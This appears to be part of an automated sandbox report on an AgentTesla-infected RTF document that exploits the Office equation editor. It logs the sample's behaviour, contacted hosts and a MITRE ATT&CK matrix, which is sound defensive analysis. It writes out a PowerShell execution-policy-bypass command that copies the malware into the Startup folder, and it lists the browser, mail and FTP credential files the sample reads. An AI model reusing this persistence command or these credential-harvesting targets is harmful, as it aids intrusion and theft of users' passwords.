                      Source: C:\Users\Public\69577.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Yara detected Beds ObfuscatorShow sources
                      Source: Yara matchFile source: 00000008.00000002.2123950202.0000000000B10000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2091326557.0000000000CD0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2125712002.0000000003289000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2092160168.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 2368, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2312, type: MEMORY
                      Source: Yara matchFile source: 8.2.Drivers.exe.b10000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.3355d30.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.32ef900.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.35c5d30.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.b10000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.cd0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.cd0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.32ef900.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.3355d30.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.35c5d30.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.355f900.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.355f900.7.raw.unpack, type: UNPACKEDPE
                      Source: C:\Users\Public\69577.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\69577.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\69577.exeWindow / User API: threadDelayed 395
                      Source: C:\Users\Public\69577.exeWindow / User API: threadDelayed 9340
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWindow / User API: threadDelayed 8814
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWindow / User API: threadDelayed 733
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2360Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2428Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2512Thread sleep time: -360000s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2860Thread sleep time: -14757395258967632s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2860Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2840Thread sleep count: 395 > 30
                      Source: C:\Users\Public\69577.exe TID: 2824Thread sleep count: 9340 > 30
                      Source: C:\Users\Public\69577.exe TID: 2860Thread sleep count: 89 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 2164Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2980Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 2196Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 2284Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 2284Thread sleep time: -480000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 1552Thread sleep count: 8814 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 1552Thread sleep count: 733 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 2284Thread sleep count: 87 > 30
                      Source: C:\Users\Public\69577.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\Public\69577.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02790806 GetSystemInfo,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000009.00000003.2121227225.0000000000447000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\69577.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\69577.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Bypasses PowerShell execution policyShow sources
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Public\69577.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\Public\69577.exeMemory written: C:\Users\Public\69577.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: C:\Users\Public\69577.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Public\69577.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\Public\69577.exeProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                      Source: 69577.exe, 00000007.00000002.2345401680.00000000010F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: 69577.exe, 00000007.00000002.2345401680.00000000010F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: 69577.exe, 00000007.00000002.2345401680.00000000010F0000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Users\Public\69577.exeQueries volume information: C:\Users\Public\69577.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\Public\69577.exeQueries volume information: C:\Users\Public\69577.exe VolumeInformation
                      Source: C:\Users\Public\69577.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\Public\69577.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000000B.00000002.2344624346.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2344628029.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.2116679901.00000000006D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2345285043.00000000023C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2125712002.0000000003289000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2092160168.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2084130363.0000000000841000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2345347245.000000000244A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2345666525.000000000257A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2700, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 2368, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2312, type: MEMORY
                      Source: Yara matchFile source: 4.2.69577.exe.3662378.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.3662378.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Drivers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.33f2378.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.32ef900.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.3355d30.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.69577.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.35c5d30.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.33f2378.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.355f900.7.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\Public\69577.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\Public\69577.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\Public\69577.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\Public\69577.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\Public\69577.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2345285043.00000000023C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2345347245.000000000244A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2345666525.000000000257A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2700, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000000B.00000002.2344624346.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2344628029.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.2116679901.00000000006D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2345285043.00000000023C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2125712002.0000000003289000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2092160168.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2084130363.0000000000841000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2345347245.000000000244A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2345666525.000000000257A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2700, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 2368, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2312, type: MEMORY
                      Source: Yara matchFile source: 4.2.69577.exe.3662378.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.3662378.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Drivers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.33f2378.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.32ef900.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.3355d30.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.69577.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.35c5d30.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Drivers.exe.33f2378.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.355f900.7.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Spearphishing Link1Windows Management Instrumentation211Startup Items1Startup Items1Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumData Obfuscation1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder12Access Token Manipulation1Deobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery115Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Process Injection112Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery111SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationEncrypted Channel1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsPowerShell2Logon Script (Mac)Registry Run Keys / Startup Folder12Software Packing2NTDSVirtualization/Sandbox Evasion13Distributed Component Object ModelInput CaptureScheduled TransferNon-Standard Port1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading121LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol132Jamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 358285 Sample: RF_IMG_7510.doc Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Multi AV Scanner detection for submitted file 2->65 67 18 other signatures 2->67 7 EQNEDT32.EXE 13 2->7         started        12 Drivers.exe 2 2->12         started        14 WINWORD.EXE 291 28 2->14         started        process3 dnsIp4 39 bit.ly 67.199.248.10, 49167, 80 GOOGLE-PRIVATE-CLOUDUS United States 7->39 41 qadir.tickfa.ir 188.253.2.221, 49168, 80 ACAIIR Australia 7->41 31 C:\Users\user\AppData\...\RF_IMG_7510[1].jpg, PE32 7->31 dropped 33 C:\Users\Public\69577.exe, PE32 7->33 dropped 69 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->69 16 69577.exe 2 7->16         started        71 Injects a PE file into a foreign processes 12->71 19 Drivers.exe 2 12->19         started        22 powershell.exe 7 12->22         started        file5 signatures6 process7 dnsIp8 45 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->45 47 Machine Learning detection for dropped file 16->47 49 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->49 51 Injects a PE file into a foreign processes 16->51 24 69577.exe 2 16->24         started        28 powershell.exe 7 16->28         started        37 nobettwo.xyz 19->37 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->53 55 Tries to steal Mail credentials (via file access) 19->55 57 Tries to harvest and steal ftp login credentials 19->57 59 Tries to harvest and steal browser information (history, passwords, etc) 19->59 signatures9 process10 dnsIp11 43 nobettwo.xyz 198.54.126.101, 49169, 49170, 587 NAMECHEAP-NETUS United States 24->43 73 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->73 75 Tries to steal Mail credentials (via file access) 24->75 35 C:\Users\user\AppData\Roaming\...\Drivers.exe, PE32 28->35 dropped 77 Drops PE files to the startup folder 28->77 79 Powershell drops PE file 28->79 file12 signatures13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      RF_IMG_7510.doc25%ReversingLabsDocument-RTF.Exploit.MathType

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RF_IMG_7510[1].jpg100%Joe Sandbox ML
                      C:\Users\Public\69577.exe100%Joe Sandbox ML

                      Unpacked PE Files

